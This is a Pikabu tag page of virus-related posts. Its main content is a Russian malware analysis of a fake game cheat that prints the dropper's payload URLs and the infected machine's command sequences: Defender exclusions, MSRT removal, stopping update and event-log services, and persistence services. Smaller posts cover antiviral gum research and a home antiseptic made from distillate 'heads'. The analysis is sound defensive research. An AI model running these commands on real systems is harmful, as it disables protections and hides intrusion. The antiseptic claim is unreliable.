Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Я хочу получать рассылки с лучшими постами за неделю
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
Создавая аккаунт, я соглашаюсь с правилами Пикабу и даю согласие на обработку персональных данных.
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam

Пикабу Игры +1000 бесплатных онлайн игр

Веселая аркада с Печенькой для новогоднего настроения. Объезжайте препятствия, а подарки, варежки, конфеты и прочие приятности не объезжайте: они помогут набрать очки и установить новый рекорд.

Сноуборд

Спорт, Аркады, На ловкость

Играть
Захватывающая аркада-лабиринт по мотивам культовой игры восьмидесятых. Управляйте желтым человечком, ешьте кексы и постарайтесь не попадаться на глаза призракам.

Пикман

Аркады, На ловкость, 2D

Играть
Открой для себя волшебный мир реальной рыбалки. Лови реальную рыбу на реальных водоемах! Исследуй новые рыболовные места и заполучи заветный трофей.

Реальная Рыбалка

Симуляторы, Мультиплеер, Спорт

Играть

Копай Дыру в России

Симуляторы, Приключения, Экшены

Играть
🔥 Дрифт и гонки без правил!
Садись за руль, жги резину и уноси баллы в безумных поворотах!
🚗 Реалистичный дрифт
🏁 Захватывающие трассы
💨 Улучши свою тачку и побеждай!

Дрифт Без Лимита

Гонки, Симуляторы, Спорт

Играть

Топ прошлой недели

  • Oskanov Oskanov 8 постов
  • AlexKud AlexKud 26 постов
  • StariiZoldatt StariiZoldatt 3 поста
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая кнопку «Подписаться на рассылку», я соглашаюсь с Правилами Пикабу и даю согласие на обработку персональных данных.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Новости Пикабу Помощь Кодекс Пикабу Реклама О компании
Команда Пикабу Награды Контакты О проекте Зал славы
Промокоды Скидки Работа Курсы Блоги
Купоны Biggeek Купоны AliExpress Купоны М.Видео Купоны YandexTravel Купоны Lamoda
Мобильное приложение

Вирус

С этим тегом используют

Коронавирус Пандемия Эпидемия Китай Юмор Болезнь Медицина Все
943 поста сначала свежее
5
Filip.Freeman
Filip.Freeman
1 месяц назад

Жвачка от микробов. 95% случаев заражения гриппом и герпесом нейтрализуются жвачкой?⁠⁠

Можно бороться с болезнью, но лучше подавлять её распространение на начальном этапе возникновения. Выходя за рамки уколов, спреев и таблеток, ученые тестируют нестандартные методы доставки противовирусных препаратов для предотвращения распространения крайне заразных микробов. Секретное оружие? Жевательная резинка, но сделанная из довольно интересного боба.

Жвачка от микробов. 95% случаев заражения гриппом и герпесом нейтрализуются жвачкой? Исследования, Научпоп, Эксперимент, Наука, Иммунитет, Жвачка, Герпес, Грипп, Вирус, Длиннопост

Антимикробная жвачка

Исследователи из Penn Dental Medicine Пенсильванского университета работали над новой моделью доставки лекарств [1] прицельно работая по вирусам, которые оседают на носоглотке. Команда изучала нейтрализацию вирусов простого герпеса (HSV-1 и HSV-2) и штаммов гриппа A (H1N1 и H3N2) с помощью заряженной препаратами жевательной резинки, изготовленной из бобов лаблаба (Lablab purpureus). Использование растительных соединений в фармакологии – вообще не редкое явление. Добрых 80% доступных препаратов разработаны на основе грибов/растений и их активных соединений. О чем подробно изложено в первой части книги «Растения и Мозг», над переводом второй и последующих частей которой сейчас кипит работа.

Жвачка с препаратами и Lablab purpureus

Lablab purpureus – это бобовое растение, также известное как гиацинт, египетская почка и индийская фасоль. Его ценность в особом белке, который может «ловить» и нейтрализовать некоторые вирусы, по сути, обладая противовирусными свойствами. Речь про белок, FRIL который уже рассматривался как элемент жевательной резинки для улавливания и обезвреживания вируса COVID [2]. Главное преимущество белка в том, что он остается стабильным когда бобовое растение измельчается в порошок и из него изготавливается жвачка.

Хотя жевательная резинка не тестировалась на людях, ее тестировали на ART-5 — симуляторе жевания, который имитирует условия ротовой полости, включая потенциальные взаимодействия с соединениями, которые могут разрушить или ингибировать FRIL. Но ученые обнаружили, что жевательная резинка на основе lablab эффективно и стабильно высвобождает белок FRIL. Более 50% белка высвобождалось в течение первых 15 минут — без каких-либо признаков токсичности или негативных взаимодействий.

И, что самое главное, два грамма бобовой жвачки с загруженными 40 мг действующего вещества снизили вирусную нагрузку более чем на 95%.

Противовирусное средство в виде жвачки

Отсутствие вакцины против вируса простого герпеса (ВПГ), низкие показатели вакцинации от вирусов гриппа, ослабление иммунитета и передача вируса после вакцинации подчеркивают необходимость снижения вирусной нагрузки в местах прямой передачи. Передача вируса через рот случается на несколько порядков чаще, чем через нос.

Со слов исследователей

Будут ли люди более охотно пользоваться противовирусной жевательной резинкой? Возможно, учитывая, что мы привыкли взаимодействовать с ротовой полостью и носоглоткой, когда болеем. То есть, те же леденцы, капли в нос выглядят вполне привычно и безобидно.

Однако в разрезе герпеса наличие легкодоступной жвачки может быть чрезвычайно полезным для остановки распространения. Учитывая, что сам штамм герпеса передается бессимптомно и поражает 27% взрослых в США. И для обоих штаммов герпеса нет лечения, а инфекция может провоцировать хронические заболевания. В том числе и болезнь Альцгеймера: первый материал и второй материал. Так что, использование такой жвачки вполне способно замедлить и остановить развитие болезни Альцгеймера.

Помимо клинических испытаний новой жевательной резинки, исследователи теперь изучают её возможности борьбы с птичьим гриппом, вирусом H5N1.

Контроль передачи вирусов по-прежнему остается серьезной глобальной проблемой. Противовирусный белок широкого спектра действия (FRIL), присутствующий в натуральном пищевом продукте (бобовом порошке) для нейтрализации не только вирусов человеческого гриппа, но и птичьего гриппа, станет своевременной инновацией для предотвращения заражений и передачи. Эти наблюдения – хорошее предзнаменование для оценки эффективности этого вида бобовых в клинических исследованиях на людях с целью минимизации заражения/передачи вируса.

Соавтор исследования Генри Дэниелл.

Чем интересна жвачка от гриппа и герпеса?

Самое главное – это простота изготовления и низкий порог вхождения для пользователя. Человеку не нужно что-либо «имплантировать» в свою ротовую полость, не нужно даже глотать препарат или устанавливать его как «пломбу-раздатчик». Жуй жвачку и живи свою лучшую жизнь!

Больше материалов про мозг, биотех, здоровье, а также тонны личного опыта биохакеров, которые делятся результатами – читайте на канале Neural Hack. Подписывайтесь, чтобы лучше понимать возможности вашего организма!

Список научных источников

  1. https://www.cell.com/molecular-therapy-family/molecular-therapy/fulltext/S1525-0016(24)00808-6

  2. https://www.sciencedirect.com/science/article/pii/S0142961222003118?via%3Dihub

Показать полностью
[моё] Исследования Научпоп Эксперимент Наука Иммунитет Жвачка Герпес Грипп Вирус Длиннопост
2
4
v.pc
v.pc
1 месяц назад

Ответ на пост «Проверяем рецепт антисептика по рецепту ВОЗ для Пикабу»⁠⁠1

Может кому интересно будет спустя пять лет...
Итак, есть потребность в антисептике. Есть дома самогонный аппарат. Есть достаточное количество голов (спиртуозность около 85%). Повторяем рецепт ВОЗ с поправкой на крепость и меньшее количество воды.
Итог - на выходе прозрачный антисептик, ничего никуда не липнет, кожа рук не пересыхает, всё в полном порядке. Так что теперь не только на розжиг и незамерзайку пойдут головы, но ещё и на антисептик!
Всем добра!

Коронавирус Антисептик Спирт Карантин Вирус ВОЗ Видео Длиннопост Ответ на пост Текст
2
9
HiddenUser1
HiddenUser1
1 месяц назад
Серия Trailers

Новости по фильму 28 Years Later⁠⁠

Вышел второй трейлер фильма 28 Years Later от Sony.

Группа выживших после заражения вирусом ярости живет на маленьком острове. Когда один из членов группы покидает остров, чтобы отправиться на материк, он обнаруживает секреты, чудеса и ужасы, которые изменили не только инфицированных, но и других выживших.

Источник: Sony Pictures Entertainment

Показать полностью 1
Новости Фильмы Новости кино и сериалов Без перевода 28 лет спустя Sony Великобритания США Трейлер Ужасы Триллер Новинки Новинки кино Описание Зомби Зомби-апокалипсис Выживание Вирус ВКонтакте RUTUBE Видео Видео ВК Длиннопост
1
mrbobbyche
mrbobbyche
2 месяца назад

Маму твоего Каспера...⁠⁠

Обиделись за то что перестал их продуктом пользоваться...

Маму твоего Каспера... Антивирус, Антивирус Касперского, Вирус, DDoS, Длиннопост
Маму твоего Каспера... Антивирус, Антивирус Касперского, Вирус, DDoS, Длиннопост
Показать полностью 2
[моё] Антивирус Антивирус Касперского Вирус DDoS Длиннопост
11
0
Ikarius
Ikarius
2 месяца назад

Подскажите что это было?⁠⁠

Сегодня утром в вагоне метро кто-то настойчиво пытался передать мне на смарт видеофайл по bluetooth. Имя пользователя "Светлана". Я постоянно отклонял приём. Файл судя по расширению именно видео, название типа: VID-20250410-WA0012.mp4

Хотя скорее всего вирус. Первый раз с таким сталкиваюсь.

Помогите советом, что это было?

Без рейтинга.

[моё] Истории из жизни Мошенничество Мобильные телефоны Bluetooth Вопрос Вирус Вирусы-шифровальщики Метро Без рейтинга Текст
20
10
KingSise
2 месяца назад

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5⁠⁠

или рассказ о том, что можно получить вместо читов.

Наткнулся на ролик, весьма свежий и решил посмотреть, что нам предлагают.

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

Исследуемый материал:  https://www.youtube.com/watch?v=r0_SLgk7f4E

Приходим в телеграмм канал и видим от 7го ноября:

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

Ну что ж, скачаем. Заметим, что заархивированы файл занимает всего 123 кб.

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

После распаковки на диск мы видим, что размер файла стал почти 18 мБ

О чем это нам говорит?  А о том, что файл хорошо сживается, и что его кто-то специально раздул до таких больших размеров. Цель тут одна – затруднить отправку файла  в различные онлайн сервисы по исследованию программ. Ок, давайте это проверим.  Загрузим в ExeInfo  и видим наличие оверлея (доп информация в файле). Просто вырежи его в отдельный файл.

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост
Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

Новый файл astral free 0.33.1_noOVL создан, и мы получили нормальный размер. А сам оверлей – это просто большой кусок, забитый нулями, ничего интересного он не представляет.

Хорошо, посмотрим что этот файл делает, откроем  его в дизассемблере и перейдём в главную функцию, которая исполняется при запуске.

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

Что же мы видим? Создаётся «метка» с именем nero_preloader,  видимо именно этой программой и был сгенерирован дропер. Пока ничего страшного, посмотрим чуть ниже.

P.S. Кто-нибудь знает что такое nero_preloader? Ответьте в коментариях.

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

Ага, интересная функция, зайдем в нее:

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

ссылка на скачивание

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

запуск исполняемого файла

Вот оно! Скачивается файл  по определённому адресу: http://uffyaa[.]ru/PacketgeoDbbaseFlowerDatalifeLocalpublicDownloads/da5911c60d39ce73116584ec5e0325f503780e55693c9952e76cab1c0441652055d0bd67ed27bb89,  копируется в :\\ProgramData\\sessionuserhost.exe и запускается.  На этом функционал этого  исполняемого файла закончен, но это же нас не остановит? Скачаем и продолжим исследование дальше.

На этот раз скачался исполняемый файл весом в 400 кБ, назовём его test.exe и продолжим

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

файл по ссылке выше

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

Так же откроем  функцию  main()  и посмотрим, что она делает. О, что мы видим!!

Основные действия функции

  1. Получение системных путей:

    • Получает путь к системной директории Windows с помощью GetSystemWindowsDirectoryA

    • Формирует пути к различным системным и программным директориям

  2. Создание вредоносных файлов и сервисов:

    • Создает файл sessionuserhost.exe в ProgramData

    • Создает задание в планировщике задач (schtasks /create) для автоматического запуска этого файла при входе в систему

    • Создает сервис с именем InputService через sc create

  3. Отключение системных защитных механизмов:

    • Отключает Windows Recovery (reagentc /disable)

    • Удаляет теневые копии томов (vssadmin delete shadows)

    • Добавляет исключение в защитник Windows через PowerShell (Add-MpPreference -ExclusionPath)

  4. Подмена системных файлов:

    • Работает с файлом hosts (\\Windows\\System32\\drivers\\etc\\hosts)

    • Вмешивается в системные файлы в директории Recovery

  5. Маскировка под легитимные процессы:

    • Создает файлы с именами, похожими на легитимные процессы:

      • steamuiupdater.exe

      • EpicOnlineServicesUpdater.exe

      • G HUB tray.exe

      • Riot Client Updater.exe

      • MSIAfterburnerServiceMonitorTray.exe

      • NVIDIA app tray.exe

      • twain_32.exe

      • system auditor.exe

      • EpicOnlineServicesInstalator.exe

  6. Выполнение команд с повышенными привилегиями:

    • Использует ShellExecuteA с параметром "runas" для выполнения команд от имени администратора

    • Выполняет несколько вредоносных команд через cmd.exe

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

стоки в файле test.txt

Продолжаем  исследовать дальше, видим обращение к некоторому адресу https://pastebin[.]com/raw/qQe7Aa7D

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

от кроем его, что же мы видим:

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

Ага, видим  то, что запишется в HOST файл нашего компьютера, теперь ни одна ссылка из этого списка не будет открываться.  Кроме того, мы видим еще 3 ссылки, В коде программы это выглядит вот так:

Дальше часть кода процедуры из test.exe:

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

Как видим, скачанный нами файл будет называться   :\\ProgramData\\controlhost.exe,  тоже самое и для  остальных двух файлов.

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

И так, основные функции данного файла и Основная цель функции:

Попытаться скачать файл config.json с ресурса https://pastebin.com/raw/qQe7Aa7D и, если это не удалось, выполнить резервную загрузку дополнительных данных (3 имполняемые файла) с нескольких подозрительных доменов (в частности, uffyaa.ru).

Инициализация переменных и строк:

  • Выделяется память под строку URL: https://pastebin.com/raw/qQe7Aa7D.

  • Из второго аргумента (a2) извлекаются указатели и длина строки (путь к директории), к которому дописывается :\\ProgramData\\config.json.

Формируется целевой путь к файлу:

  • Собирается строка пути, куда должен быть сохранён файл: например, C:\ProgramData\config.json.

Попытка загрузки файла с Pastebin:

  • Используется URLDownloadToFileA, чтобы скачать файл по указанному URL и сохранить в подготовленном пути.

  • Если загрузка прошла успешно, функция завершает работу, иначе переходит к резервной логике.

Резервная логика загрузки (fallback):

  • Если основной файл не загружен, вызывается функция download01 с различными параметрами (ключи: "count", "type", "link0", "link1", "link2").

  • Эти ключи соответствуют различным частям конфигурации или файлов:

    • "type": ".exe" — ожидается исполняемый файл.

    • "link0", "link1", "link2" — это прямые ссылки на вредоносные загрузки с сервера uffyaa.ru, каждая ведёт к конкретному зашифрованному или закодированному payload.

Заключение:

Функция реализует двухэтапную схему получения вредоносной конфигурации:

  1. Сначала пытается скачать конфиг с Pastebin.

  2. Если не удалось — переходит к запасным URL, каждый из которых может представлять отдельную угрозу (исполняемые файлы, настройки, ключи и т.д.).

Продолжим наше исследование и скачаем содержание этих 3-х ссылок:

http://[virus].ru/PacketgeoDbbaseFlowerDatalifeLocalpublicDownloads/6adc1e14c896571371bc6e1c4f7763c7dd67d22af827cc0b57c4bde8e8925ba6f4120c2f803e7acc

http://[virus].ru/PacketgeoDbbaseFlowerDatalifeLocalpublicDownloads/6adc1e14c896571371bc6e1c4f7763c7dd67d22a0fa376726207bab855d42dfae89552cc17559ca3

http://[virus].ru/PacketgeoDbbaseFlowerDatalifeLocalpublicDownloads/9a094aaf722f08d3740be907a66838ad10afc6b865efdfd57fdb96d631878268f5775ef930869653

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

И так, мы получили 3 файла разного размера, начнем:

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

Первые 2 – это 64х битные  файлы с SSL сертификатом  в оверлее.

Файл file1.ex_ :

Приводить участки кода не буду, но вот  список того что она делает:

  1. C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process '"C:\Users\admin\Desktop\file1.exe"' -Verb runAs

  2. C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

  3. C:\WINDOWS\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

  4. wusa  /uninstall /kb:890830 /quiet /norestart

  5. C:\WINDOWS\system32\sc.exe stop UsoSvc

  6. C:\WINDOWS\system32\sc.exe stop wuauserv

  7. C:\WINDOWS\system32\sc.exe stop bits

  8. C:\WINDOWS\system32\sc.exe stop dosvc

  9. C:\WINDOWS\system32\powercfg.exe /x -hibernate-timeout-dc 0

  10. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-ac 0

  11. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-dc 0

  12. Создает C:\WINDOWS\system32\dialer.exe

  13. C:\WINDOWS\system32\sc.exe delete "EJJYGAKZ"

  14. C:\WINDOWS\system32\sc.exe create "EJJYGAKZ" binpath= "C:\ProgramData\jtixikfvpels\lxwvsyozcpiw.exe" start= "auto"

  15. C:\WINDOWS\system32\sc.exe stop eventlog

  16. C:\WINDOWS\system32\sc.exe start "EJJYGAKZ"

  17. "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" "тут обфусцированный скрипт"

  18. C:\WINDOWS\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

  19. wusa  /uninstall /kb:890830 /quiet /norestart

  20. C:\WINDOWS\system32\sc.exe stop UsoSvc

  21. C:\WINDOWS\system32\sc.exe stop WaaSMedicSvc

  22. C:\WINDOWS\system32\sc.exe stop wuauserv

  23. C:\WINDOWS\system32\sc.exe stop bits

  24. C:\WINDOWS\system32\sc.exe stop dosvc

  25. C:\WINDOWS\system32\powercfg.exe /x -hibernate-timeout-ac 0

  26. C:\WINDOWS\system32\powercfg.exe /x -hibernate-timeout-dc 0

  27. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-ac 0

  28. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-dc 0

  29. Запуск C:\WINDOWS\system32\dialer.exe

  30. C:\Windows\System32\dllhost.exe /Processid:{7cfb6527-f523-4e75-b050-9073d7bf3e84}

  31. "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" " тут обфусцированный скрипт "

  32. C:\Windows\System32\dllhost.exe /Processid:{7097c13c-ab69-4ab9-941c-0a3ff141828d}

  33. C:\WINDOWS\System32\slui.exe -Embedding

А теперь тоже самое, с расшифровкой:

1. Запускается file1.exe с повышенными правами (администратор), что критично для выполнения всех следующих действий.

2. Копирует .exe файлы в каталоги %UserProfile% и %ProgramData%. Это позволяет запускать и сохранять вредоносный код без обнаружения.

3–4, 18–19. Удаление обновления Windows KB890830

wusa /uninstall /kb:890830 /quiet /norestart

KB890830 — это средство удаления вредоносных программ (MSRT).

Злоумышленник удаляет его, чтобы оно не удалило вредоносное ПО.

5–8, 20–24. Отключение обновлений и службы передачи данных

sc stop UsoSvc

sc stop wuauserv

sc stop bits

sc stop dosvc

*  Отключение служб:

  • Центра обновления Windows (wuauserv)

  • Интеллектуальной передачи данных в фоне (BITS)

  • Обновления операционной системы (UsoSvc, WaaSMedicSvc, dosvc)

*  Цель: остановить обновления и вмешательство Microsoft.

9–11, 25–28. Отключение автоматического сна и гибернации

powercfg.exe /x ...

*  Модифицирует схемы питания:

  • Устанавливает таймауты гибернации и сна в 0.

*  Цель: предотвратить переход ПК в спящий режим, чтобы вредоносный код работал непрерывно

12. Создание dialer.exe в system32

  Необычное место и имя.

13–16. Создание и запуск вредоносной службы

sc delete "EJJYGAKZ"

sc create "EJJYGAKZ" binpath= "..." start= "auto"

sc stop eventlog

sc start "EJJYGAKZ"

Удаляется старая служба, создаётся новая с автостартом.

  • Программа lxwvsyozcpiw.exe будет запускаться при загрузке.

  • Остановка eventlog — попытка скрыть следы в журнале событий.


17, 31. Выполнение сложного PowerShell-скрипта с динамической загрузкой и внедрением

  • Скрипт создает динамический делегат, используя Reflection.Emit.

  • Получает доступ к системным сборкам и вызывает низкоуровневые функции.

  • Используется Marshal::GetDelegateForFunctionPointer, Copy, Invoke и т.п.

  • Это указывает на:

    • Создание и внедрение shell-кода

    • Вызов функций из сторонних DLL

    • Динамическую декриптацию или загрузку полезной нагрузки

  • Также возможно, что выполняется DLL-сидeloading или внедрение в dllhost.exe.

30. Запуск DLLHost с нестандартным идентификатором COM

*  Вероятно, загрузка вредоносной DLL через COM-объект.

*  Используется для маскировки и уклонения от обнаружения.

29. Запуск dialer.exe

  • Ранее созданный исполняемый файл.

  • Основной вредоносный компонент.

Итоговая цель вредоносной программы

  • Получить полный контроль над системой

  • Отключить защиту и обновления

  • Скрыть активность

  • Закрепиться через автозапуск

  • Выполнить вредоносную нагрузку (включая DLL sideloading, shellcode, системные вызовы)

  • Возможное дальнейшее заражение или шпионаж

Как вы могли заметить, выполнились 2 PowerShell  скрипта,  после их расшифровки мы можем понять, что делает эта программа. Вот подробное описание, что делает эта вредоносная программа на основе всех 31 шага:

🔧 1. Запуск вредоносного исполняемого файла с правами администратора

powershell.exe Start-Process '"C:\Users\admin\Desktop\file1.exe"' -Verb runAs

Запускает исполняемый файл с повышенными правами (UAC bypass).


🛡️ 2. Отключение антивирусной защиты Windows Defender

powershell  Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

Добавляет в исключения директории и расширение .exe, чтобы антивирус игнорировал любые EXE-файлы, особенно в папках пользователя и ProgramData.


🧹 3, 4, 18, 19. Удаление инструмента для очистки вредоносных программ

cmd  wusa /uninstall /kb:890830 /quiet /norestart

Удаляет KB890830 — это Microsoft Windows Malicious Software Removal Tool (MSRT). Деактивирует его, чтобы он не удалил вредоносный код.

⚙️ 5–8, 20–24. Отключение сервисов обновлений и фоновых служб

cmd sc.exe stop UsoSvc, wuauserv, bits, dosvc, WaaSMedicSvc

Выключает службы:

  • UsoSvc — обновления Windows

  • wuauserv — агент обновлений

  • bits — фоновая загрузка

  • dosvc — оркестратор доставки

  • WaaSMedicSvc — сервис восстановления обновлений

📛 Цель — остановить обновления и автоматическое восстановление системных компонентов, чтобы система не восстановилась после заражения.

🔌 9–11, 25–28. Изменение параметров электропитания

cmd  powercfg.exe /x -standby-timeout-ac 0, /x -hibernate-timeout-dc 0 и т.п.

Отключает ожидание и гибернацию, чтобы система постоянно работала и не уходила в спящий режим. Это может быть нужно для непрерывной работы вредоносного кода.


⚠️ 12. Создание вредоносного dialer.exe

Создаёт файл C:\WINDOWS\system32\dialer.exe. Вероятно, это вредоносный компонент.


🧪 13–16. Удаление, создание и запуск скрытого сервиса

cmd sc.exe delete "EJJYGAKZ"

cmd sc.exe create "EJJYGAKZ" binpath= "C:\ProgramData\jtixikfvpels\lxwvsyozcpiw.exe" start= "auto"

cmd sc.exe start "EJJYGAKZ"

Удаляет старый сервис и создаёт новый с произвольным именем, который указывает на вредоносный EXE в ProgramData. Сервис будет запускаться автоматически при старте системы.

🚨 15. Остановка системного журнала событий

cmd  sc.exe stop eventlog

Отключает логирование событий. Это мешает расследованию и скрывает следы.


🧬 17. Динамическая генерация вредоносного .NET-кода в PowerShell

Большой PowerShell-скрипт:

  • Создаёт в памяти сборку .NET.

  • Динамически компилирует делегаты (обработчики функций).

  • Использует GetProcAddress для доступа к WinAPI-функциям.

  • Патчит память (в том числе — делает VirtualProtect).

  • Загружает DLL (в том числе из SOFTWARE\dialerstager в реестре).

  • Возможно, загружает вторичный пейлоад или обходит защиту.

📌 Это обфусцированный загрузчик или инжектор, работающий полностью в памяти. Очень продвинутый подход.

☎️ 29. Запуск созданного dialer.exe

Продолжает выполнение уже подготовленного вредоносного компонента.


🧪 30. Запуск COM-хоста (dllhost.exe) с уникальным идентификатором CLSID

cmd  dllhost.exe /Processid:{...}

Может использоваться для запуска COM-объекта — часто применяется для инжекции или маскировки кода, запускаемого через системные службы.

🧬 31. Ещё один PowerShell с генерацией и вызовом делегатов

Похож на шаг 17. Второй PowerShell-скрипт делает то же самое:

  • Создаёт в памяти типы.

  • Патчит системные функции.

  • Загружает вредоносные модули.

🧠 Итоговая картина

Программа:

  1. Запускает вредоносный EXE от имени администратора.

  2. Обходит Windows Defender.

  3. Удаляет средства защиты от вредоносного ПО.

  4. Отключает службы обновлений и логирования.

  5. Меняет параметры питания.

  6. Устанавливает и запускает вредоносные сервисы.

  7. Генерирует .NET-код прямо в памяти (fileless-инжекция).

  8. Загружает скрытые DLL или shellcode.

  9. Осуществляет запуск и маскировку через dialer.exe и dllhost.exe.

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

Кроме того запускаемый дилер запускается в нулевом конце доступа, как драйвер и если прибить такой процесс, система выпадет в синий экран.

Что же делает File2.exe?

  1. C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process '"C:\Users\admin\Desktop\file2.exe"' -Verb runAs

  2. C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

  3. C:\WINDOWS\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

  4. wusa  /uninstall /kb:890830 /quiet /norestart

  5. C:\WINDOWS\system32\sc.exe stop UsoSvc

  6. C:\WINDOWS\system32\sc.exe stop WaaSMedicSvc

  7. C:\WINDOWS\system32\sc.exe stop wuauserv

  8. C:\WINDOWS\system32\sc.exe stop bits 

  9. C:\WINDOWS\system32\powercfg.exe /x -hibernate-timeout-ac 0“

  10. C:\WINDOWS\system32\powercfg.exe /x -hibernate-timeout-dc 0

  11. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-ac 0

  12. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-dc 0

  13. start  C:\WINDOWS\system32\dialer.exe

  14. C:\WINDOWS\system32\sc.exe delete "WLJNDOJC"

  15. C:\WINDOWS\system32\sc.exe create "WLJNDOJC" binpath= "C:\ProgramData\zrntznqzxmws\ydmehmmzlokc.exe" start= "auto"

  16. C:\WINDOWS\system32\sc.exe stop eventlog

  17. C:\WINDOWS\system32\sc.exe start "WLJNDOJC"

  18. C:\WINDOWS\system32\SppExtComObj.exe -Embedding

  19. "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent

  20. "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" "function ....."

  21. start C:\ProgramData\zrntznqzxmws\ydmehmmzlokc.exe

